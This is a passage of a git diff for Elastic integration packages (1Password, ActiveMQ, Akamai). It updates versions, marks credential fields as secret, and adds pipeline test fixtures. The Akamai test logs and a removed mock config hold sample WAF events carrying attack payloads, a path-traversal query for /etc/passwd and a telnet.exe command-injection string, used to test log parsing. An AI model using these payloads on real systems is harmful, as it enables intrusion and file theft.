h1:T7rjd5wvLnPBV1vC4zWd/iWRbV8Mdxs+nGaoaFzGw3s= k8s.io/component-base v0.29.0/go.mod h1:sADonFTQ9Zc9yFLghpDpmNXEdHyQmFIGbiuZbqAXQ1M= k8s.io/klog/v2 v2.110.1 h1:U/Af64HJf7FcwMcXyKm2RPM22WZzyR7OSpYj5tg3cL0= diff --git a/links_table.yml b/links_table.yml index 919d6eb5b58..423a2637f58 100644 --- a/links_table.yml +++ b/links_table.yml @@ -13,6 +13,7 @@ links: filebeat-input-filestream-parsers: https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-filestream.html#_parsers fleet-overview: https://www.elastic.co/guide/en/fleet/current/fleet-overview.html getting-started-observability: https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html + logstash-monitoring-ea: https://www.elastic.co/guide/en/logstash/current/monitoring-with-ea.html kibana-introduction: https://www.elastic.co/guide/en/kibana/current/introduction.html kibana-security-settings: https://www.elastic.co/guide/en/kibana/current/security-settings-kb.html kibana-logging-configuration: https://www.elastic.co/guide/en/kibana/current/logging-configuration.html diff --git a/packages/1password/changelog.yml b/packages/1password/changelog.yml index e224e1d1dae..3ac92f2f347 100644 --- a/packages/1password/changelog.yml +++ b/packages/1password/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.27.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.26.1" changes: - description: Changed owners diff --git a/packages/1password/manifest.yml b/packages/1password/manifest.yml index 01a514e805d..ce288a75d6c 100644 --- a/packages/1password/manifest.yml +++ b/packages/1password/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: 1password title: "1Password" -version: "1.26.1" +version: "1.27.0" description: Collect logs from 1Password with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - credential_management conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/1password-signinattempts-screenshot.png title: Sign-in attempts @@ -55,6 +55,7 @@ policy_templates: Bearer Token, e.g. "eyJhbGciO..." show_user: true required: true + secret: true - name: http_client_timeout type: text title: HTTP Client Timeout diff --git a/packages/activemq/_dev/build/docs/README.md b/packages/activemq/_dev/build/docs/README.md index 78b6e9c5250..7b6c2f2363b 100644 --- a/packages/activemq/_dev/build/docs/README.md +++ b/packages/activemq/_dev/build/docs/README.md @@ -84,7 +84,9 @@ After the integration is successfully configured, clicking on the Assets tab of ## Troubleshooting -If `host.ip` appears conflicted under the `log-*` or `metrics-*` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the indices of the `Audit`, `Log`, `Broker`, `Queue` and `Topic` data streams. +If `host.ip` is shown conflicted under ``logs-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Audit`` and ``Log`` data stream's indices. + +If `host.ip` is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Broker``, ``Queue`` and ``Topic`` data stream's indices. ## Logs diff --git a/packages/activemq/changelog.yml b/packages/activemq/changelog.yml index 4c51a265703..0cd8019260c 100644 --- a/packages/activemq/changelog.yml +++ b/packages/activemq/changelog.yml @@ -1,4 +1,34 @@ # newer versions go on top +- version: 1.2.1 + changes: + - description: Add pipeline tests for Broker, Queue and Topic data streams. + type: enhancement + link: https://github.com/elastic/integrations/pull/9423 +- version: 1.2.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: 1.1.1 + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: 1.1.0 + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 +- version: 1.0.0 + changes: + - description: Make ActiveMQ GA. + type: enhancement + link: https://github.com/elastic/integrations/pull/8939 +- version: 0.16.1 + changes: + - description: Update link to the correct reindexing procedure. + type: bugfix + link: https://github.com/elastic/integrations/pull/9021 - version: 0.16.0 changes: - description: Update README to use documentation guidelines. diff --git a/packages/activemq/data_stream/broker/_dev/test/pipeline/test-broker.json b/packages/activemq/data_stream/broker/_dev/test/pipeline/test-broker.json new file mode 100644 index 00000000000..3c1d9915853 --- /dev/null +++ b/packages/activemq/data_stream/broker/_dev/test/pipeline/test-broker.json @@ -0,0 +1,41 @@ +{ + "events": [ + { + "activemq": { + "broker": { + "name": "localhost", + "mbean": "org.apache.activemq:brokerName=localhost,type=Broker", + "messages": { + "dequeue": { + "count": 5 + }, + "count": 1, + "enqueue": { + "count": 19 + } + }, + "memory": { + "temp": { + "pct": 1 + }, + "broker": { + "pct": 2 + }, + "store": { + "pct": 4 + } + }, + "connections": { + "count": 3 + }, + "producers": { + "count": 5 + }, + "consumers": { + "count": 5 + } + } + } + } + ] +} \ No newline at end of file diff --git a/packages/activemq/data_stream/broker/_dev/test/pipeline/test-broker.json-expected.json b/packages/activemq/data_stream/broker/_dev/test/pipeline/test-broker.json-expected.json new file mode 100644 index 00000000000..9864596648c --- /dev/null +++ b/packages/activemq/data_stream/broker/_dev/test/pipeline/test-broker.json-expected.json @@ -0,0 +1,53 @@ +{ + "expected": [ + { + "activemq": { + "broker": { + "connections": { + "count": 3 + }, + "consumers": { + "count": 5 + }, + "mbean": "org.apache.activemq:brokerName=localhost,type=Broker", + "memory": { + "broker": { + "pct": 2 + }, + "store": { + "pct": 4 + }, + "temp": { + "pct": 1 + } + }, + "messages": { + "count": 1, + "dequeue": { + "count": 5 + }, + "enqueue": { + "count": 19 + } + }, + "name": "localhost", + "producers": { + "count": 5 + } + } + }, + "ecs": { + "version": "8.5.1" + }, + "event": { + "category": [ + "web" + ], + "kind": "metric", + "type": [ + "info" + ] + } + } + ] +} \ No newline at end of file diff --git a/packages/activemq/data_stream/broker/_dev/test/pipeline/test-common-config.yml b/packages/activemq/data_stream/broker/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..e071d397ddf --- /dev/null +++ b/packages/activemq/data_stream/broker/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,2 @@ +dynamic_fields: + "event.ingested": ".*" diff --git a/packages/activemq/data_stream/queue/_dev/test/pipeline/test-common-config.yml b/packages/activemq/data_stream/queue/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..e071d397ddf --- /dev/null +++ b/packages/activemq/data_stream/queue/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,2 @@ +dynamic_fields: + "event.ingested": ".*" diff --git a/packages/activemq/data_stream/queue/_dev/test/pipeline/test-queue.json b/packages/activemq/data_stream/queue/_dev/test/pipeline/test-queue.json new file mode 100644 index 00000000000..6649c188d6d --- /dev/null +++ b/packages/activemq/data_stream/queue/_dev/test/pipeline/test-queue.json @@ -0,0 +1,49 @@ +{ + "events": [ + { + "activemq": { + "queue": { + "name": "elastic", + "mbean": "org.apache.activemq:brokerName=localhost,destinationName=elastic,destinationType=Queue,type=Broker", + "memory": { + "broker": { + "pct": 2 + } + }, + "size": 2, + "consumers": { + "count": 5 + }, + "messages": { + "inflight": { + "count": 2 + }, + "expired": { + "count": 1 + }, + "enqueue": { + "time": { + "avg": 5, + "min": 5, + "max": 5 + }, + "count": 5 + }, + "dequeue": { + "count": 2 + }, + "size": { + "avg": 1 + }, + "dispatch": { + "count": 2 + } + }, + "producers": { + "count": 5 + } + } + } + } + ] +} \ No newline at end of file diff --git a/packages/activemq/data_stream/queue/_dev/test/pipeline/test-queue.json-expected.json b/packages/activemq/data_stream/queue/_dev/test/pipeline/test-queue.json-expected.json new file mode 100644 index 00000000000..600e98edddc --- /dev/null +++ b/packages/activemq/data_stream/queue/_dev/test/pipeline/test-queue.json-expected.json @@ -0,0 +1,61 @@ +{ + "expected": [ + { + "activemq": { + "queue": { + "consumers": { + "count": 5 + }, + "mbean": "org.apache.activemq:brokerName=localhost,destinationName=elastic,destinationType=Queue,type=Broker", + "memory": { + "broker": { + "pct": 2 + } + }, + "messages": { + "dequeue": { + "count": 2 + }, + "dispatch": { + "count": 2 + }, + "enqueue": { + "count": 5, + "time": { + "avg": 5, + "max": 5, + "min": 5 + } + }, + "expired": { + "count": 1 + }, + "inflight": { + "count": 2 + }, + "size": { + "avg": 1 + } + }, + "name": "elastic", + "producers": { + "count": 5 + }, + "size": 2 + } + }, + "ecs": { + "version": "8.5.1" + }, + "event": { + "category": [ + "web" + ], + "kind": "metric", + "type": [ + "info" + ] + } + } + ] +} \ No newline at end of file diff --git a/packages/activemq/data_stream/topic/_dev/test/pipeline/test-common-config.yml b/packages/activemq/data_stream/topic/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..e071d397ddf --- /dev/null +++ b/packages/activemq/data_stream/topic/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,2 @@ +dynamic_fields: + "event.ingested": ".*" diff --git a/packages/activemq/data_stream/topic/_dev/test/pipeline/test-topic.json b/packages/activemq/data_stream/topic/_dev/test/pipeline/test-topic.json new file mode 100644 index 00000000000..754ddb69d79 --- /dev/null +++ b/packages/activemq/data_stream/topic/_dev/test/pipeline/test-topic.json @@ -0,0 +1,48 @@ +{ + "events": [ + { + "activemq": { + "topic": { + "consumers": { + "count": 5 + }, + "memory": { + "broker": { + "pct": 2 + } + }, + "mbean": "org.apache.activemq:brokerName=localhost,destinationName=Test,destinationType=Topic,type=Broker", + "messages": { + "enqueue": { + "count": 5, + "time": { + "avg": 5, + "max": 5, + "min": 5 + } + }, + "size": { + "avg": 2 + }, + "dispatch": { + "count": 1 + }, + "inflight": { + "count": 2 + }, + "expired": { + "count": 2 + }, + "dequeue": { + "count": 5 + } + }, + "name": "Test", + "producers": { + "count": 5 + } + } + } + } + ] +} \ No newline at end of file diff --git a/packages/activemq/data_stream/topic/_dev/test/pipeline/test-topic.json-expected.json b/packages/activemq/data_stream/topic/_dev/test/pipeline/test-topic.json-expected.json new file mode 100644 index 00000000000..1ab3eac356d --- /dev/null +++ b/packages/activemq/data_stream/topic/_dev/test/pipeline/test-topic.json-expected.json @@ -0,0 +1,60 @@ +{ + "expected": [ + { + "activemq": { + "topic": { + "consumers": { + "count": 5 + }, + "mbean": "org.apache.activemq:brokerName=localhost,destinationName=Test,destinationType=Topic,type=Broker", + "memory": { + "broker": { + "pct": 2 + } + }, + "messages": { + "dequeue": { + "count": 5 + }, + "dispatch": { + "count": 1 + }, + "enqueue": { + "count": 5, + "time": { + "avg": 5, + "max": 5, + "min": 5 + } + }, + "expired": { + "count": 2 + }, + "inflight": { + "count": 2 + }, + "size": { + "avg": 2 + } + }, + "name": "Test", + "producers": { + "count": 5 + } + } + }, + "ecs": { + "version": "8.5.1" + }, + "event": { + "category": [ + "web" + ], + "kind": "metric", + "type": [ + "info" + ] + } + } + ] +} \ No newline at end of file diff --git a/packages/activemq/docs/README.md b/packages/activemq/docs/README.md index b88968da1eb..5f3a1154ce2 100644 --- a/packages/activemq/docs/README.md +++ b/packages/activemq/docs/README.md @@ -84,7 +84,9 @@ After the integration is successfully configured, clicking on the Assets tab of ## Troubleshooting -If `host.ip` appears conflicted under the `log-*` or `metrics-*` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the indices of the `Audit`, `Log`, `Broker`, `Queue` and `Topic` data streams. +If `host.ip` is shown conflicted under ``logs-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Audit`` and ``Log`` data stream's indices. + +If `host.ip` is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Broker``, ``Queue`` and ``Topic`` data stream's indices. ## Logs diff --git a/packages/activemq/manifest.yml b/packages/activemq/manifest.yml index 2c9c074f0c7..5364305ec91 100644 --- a/packages/activemq/manifest.yml +++ b/packages/activemq/manifest.yml @@ -1,6 +1,6 @@ name: activemq title: ActiveMQ -version: "0.16.0" +version: "1.2.1" description: Collect logs and metrics from ActiveMQ instances with Elastic Agent. type: integration icons: @@ -8,13 +8,13 @@ icons: title: activemq size: 32x32 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.2" categories: - message_queue - observability conditions: kibana: - version: ^8.8.0 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -79,6 +79,7 @@ policy_templates: multi: false required: true show_user: true + secret: true description: Password for authentication of ActiveMQ instance. default: admin - name: ssl diff --git a/packages/akamai/_dev/deploy/docker/Dockerfile b/packages/akamai/_dev/deploy/docker/Dockerfile new file mode 100644 index 00000000000..b5948e258c5 --- /dev/null +++ b/packages/akamai/_dev/deploy/docker/Dockerfile @@ -0,0 +1,5 @@ +FROM golang:1.21 + +RUN go install github.com/andrewkroh/go-examples/akamai-siem-emulator@80b18780e7 + +CMD akamai-siem-emulator -h \ No newline at end of file diff --git a/packages/akamai/_dev/deploy/docker/docker-compose.yml b/packages/akamai/_dev/deploy/docker/docker-compose.yml index 6f0dc33289a..d3c835666cc 100644 --- a/packages/akamai/_dev/deploy/docker/docker-compose.yml +++ b/packages/akamai/_dev/deploy/docker/docker-compose.yml @@ -1,14 +1,15 @@ version: '2.3' services: - akamai: - image: docker.elastic.co/observability/stream:v0.6.1 + akamai-siem-emulator: + hostname: akamai-siem-emulator + build: + context: . + dockerfile: Dockerfile ports: - - 8080 - volumes: - - ./files:/files:ro - environment: - PORT: 8080 + - 9903 command: - - http-server - - --addr=:8080 - - --config=/files/config.yml + - akamai-siem-emulator + - -http=:9903 + - -access-token=at-6b8c7217-8748-490d-b0f5-bfeb72b2e7cd + - -client-secret=cs-0d15cfd9-764a-48e6-a822-22756180ddb8 + - -client-token=ct-f625f0b8-9c8f-44ce-8250-eaf17bc93051 diff --git a/packages/akamai/_dev/deploy/docker/files/config.yml b/packages/akamai/_dev/deploy/docker/files/config.yml deleted file mode 100644 index 98e34ef04eb..00000000000 --- a/packages/akamai/_dev/deploy/docker/files/config.yml +++ /dev/null @@ -1,38 +0,0 @@ -rules: - # Initial iteration. - - path: /siem/v1/configs/aaaa - methods: ["GET"] - request_headers: - authorization: ["EG1-HMAC-SHA256 client_token=qwerasdf;access_token=abcd;timestamp=\\d{8}T(\\d{2}:){2}\\d{2}\\+0000;nonce=[a-f0-9]{8}-([a-f0-9]{4}-){3}[a-f0-9]{12};signature=.*"] - query_params: - from: "{from:.*}" - to: "{to:.*}" - responses: - - status_code: 200 - body: |- - {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c09","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} - {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f33","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} - {"total":2,"offset":"offset1","limit":2} - # Second iteration. - - path: /siem/v1/configs/aaaa - methods: ["GET"] - request_headers: - authorization: ["EG1-HMAC-SHA256 client_token=qwerasdf;access_token=abcd;timestamp=\\d{8}T(\\d{2}:){2}\\d{2}\\+0000;nonce=[a-f0-9]{8}-([a-f0-9]{4}-){3}[a-f0-9]{12};signature=.*"] - query_params: - offset: "offset1" - responses: - - status_code: 200 - body: |- - {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"3158db1758e37bfe67b7c09","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} - {"total":1,"offset":"offset2"} - # Final iteration. - - path: /siem/v1/configs/aaaa - methods: ["GET"] - request_headers: - authorization: ["EG1-HMAC-SHA256 client_token=qwerasdf;access_token=abcd;timestamp=\\d{8}T(\\d{2}:){2}\\d{2}\\+0000;nonce=[a-f0-9]{8}-([a-f0-9]{4}-){3}[a-f0-9]{12};signature=.*"] - query_params: - offset: "offset2" - responses: - - status_code: 200 - body: |- - {"total":0,"offset":"offset2"} diff --git a/packages/akamai/changelog.yml b/packages/akamai/changelog.yml index fd05c044219..639790bd9f0 100644 --- a/packages/akamai/changelog.yml +++ b/packages/akamai/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "2.23.2" + changes: + - description: Handle HTTP headers without values. + type: bugfix + link: https://github.com/elastic/integrations/pull/9486 +- version: "2.23.1" + changes: + - description: Fix errors processing empty userRiskData.{risk,trust,general} values. + type: bugfix + link: https://github.com/elastic/integrations/pull/9483 +- version: "2.23.0" + changes: + - description: Set sensitive values as secret and add missing mappings. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 +- version: "2.22.0" + changes: + - description: Require 8.11.0 or greater because it contains necessary fixes to the Elastic Agent. + type: bugfix + link: https://github.com/elastic/integrations/pull/9042 - version: "2.21.1" changes: - description: Changed owners diff --git a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log index 838d5e98cff..8ceb2679c14 100644 --- a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log +++ b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log @@ -1,3 +1,4 @@ {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"1158db1758e37bfe67b7c09","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} +{"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"14227","policyId":"qik1_26545","ruleActions":"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d","ruleData":"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX ","ruleMessages":"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 ","ruleSelectors":"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b","ruleTags":"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R ","ruleVersions":"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d","rules":"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ"},"geo":{"asn":"14618","city":"ASHBURN","continent":"288","country":"US","regionCode":"VA"},"httpMessage":{"bytes":"266","host":"www.hmapi.com","method":"GET","path":"/","port":"80","protocol":"HTTP/1.1","query":"option=com_jce%20telnet.exe","requestHeaders":"Host:%20example.com%0D%0Ajsessionid:%0D%0AAccept-Encoding:%20gzip%0D%0A","requestId":"1158db1758e37bfe67b7c09","responseHeaders":"Server:%20AkamaiGHost%0D%0AMime-Version:%201.0%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%20150%0D%0AX-NoValueHeader:%0D%0A","start":"1491303422","status":"200"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"","trust":"","general":"","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} {"format":"json","type":"akamai_siem","version":"1.0","attackData":{"clientIP":"89.160.20.156","configId":"6724","policyId":"scoe_5426","ruleActions":"QUxFUlQ;REVOWQ==","ruleData":"YWxlcnQo;Y3VybA==","ruleMessages":"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=","ruleSelectors":"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=","ruleTags":"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND","ruleVersions":";","rules":"OTUwMDA0;OTkwMDEx"},"geo":{"asn":"12271","city":"NEWYORK","continent":"NA","country":"US","regionCode":"NY"},"httpMessage":{"bytes":"34523","host":"www.example.com","method":"POST","path":"/examples/1/","port":"80","protocol":"http/2","query":"a%3D..%2F..%2F..%2Fetc%2Fpasswd","requestHeaders":"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml","requestId":"2ab418ac8515f33","responseHeaders":"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml","start":"1470923133.026","status":"301","tls": "TLSv1.2"},"userRiskData":{"uuid":"964d54b7-0821-413a-a4d6-8131770ec8d5","status":"0","score":"75","risk":"udfp:1325gdg4g4343g/M|unp:74256/H","trust":"ugp:US","general":"duc_1h:10|duc_1d:30","allow":"0"},"clientData":{"appBundleId":"com.mydomain.myapp","appVersion":"1.23","sdkVersion":"4.7.1","telemetryType":"2"},"botData":{"botScore":"100","responseSegment":"3"}} {"total":10000,"offset":"71cca;3phZmEdPj6YEqml0rvbdWDZGW3mCiJIwjyhkJfsLFM2gVYPgE8-N_0CiLI9gwH0_4OJ87xDQ3b-gIsx_kEBdf7aaC_AvDpG9fMxypeaCma10FKrY9VKE","limit":10000} \ No newline at end of file diff --git a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json index 